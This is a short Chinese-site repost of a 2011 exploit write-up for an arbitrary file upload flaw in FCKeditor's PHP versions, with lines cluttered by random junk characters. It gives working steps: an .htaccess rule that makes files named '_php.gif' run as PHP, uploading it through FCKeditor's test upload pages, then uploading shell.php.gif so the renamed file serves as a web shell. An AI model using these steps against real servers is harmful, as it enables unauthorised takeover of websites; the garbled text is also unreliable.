FCKeditor所有php版本Upload上传漏洞 a. U/ c8 }) D" U! z; |( f- m
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
! c6 f# B; g n9 a减小字体 增大字体
9 m% N8 M& v& o[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
# J6 ?5 V# r8 ~, Z5 \" K[+] Date: 2011
& K% o/ a F. a [[+] Author : sinesafe.cn+ r" P8 p0 e6 ~! A9 h
[+] Website : WwW.sinesafe.cn' y+ A$ b& q2 r/ ?/ ?: _
———————————————————# p# J9 M& Y2 T E/ V' X' d( Q9 _
1.create a htaccess file:8 ^$ J; c: k3 Z" E" |0 \: ^& \
code:3 G! {# \& @" T* J9 O6 x) e8 M
<FilesMatch “_php.gif”>
" y7 {& q6 B# H6 f1 e3 WSetHandler application/x-httpd-php, Q) X% r) I, m, v# F2 A* o
</FilesMatch>
9 z4 g# A8 Z6 h4 M1 h5 C! k( ?2 F' h% o
2.Now upload this htaccess with FCKeditor.* A3 v# p k" E: R: l7 E
0 d' F+ R% |/ S/ a7 |7 T$ Q6 w
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
' L/ A" e+ v/ `/ r1 `9 k( B2 i) ?3 {
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
% ?+ |$ T; F* M5 V/ _( P+ Q0 K& m% F/ G# F
———————————————————————————————-
( E" c4 D0 Y' g/ b- K6 t3.Now upload shell.php.gif with FCKeditor.
" ?1 [! i6 \/ r4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.# ]% ?# n, L$ y1 { o6 u
5.http://www.sinesafe.cn/anything/shell_php.gif; c) R. O/ \0 E! A7 a6 U" R$ h
6.Now shell is available from server. |
1 d1 H* e/ X6 T0 m" `( g. J. w! r! h% r( r
# f. H; R- X* n( Z: I$ k4 }0 a
|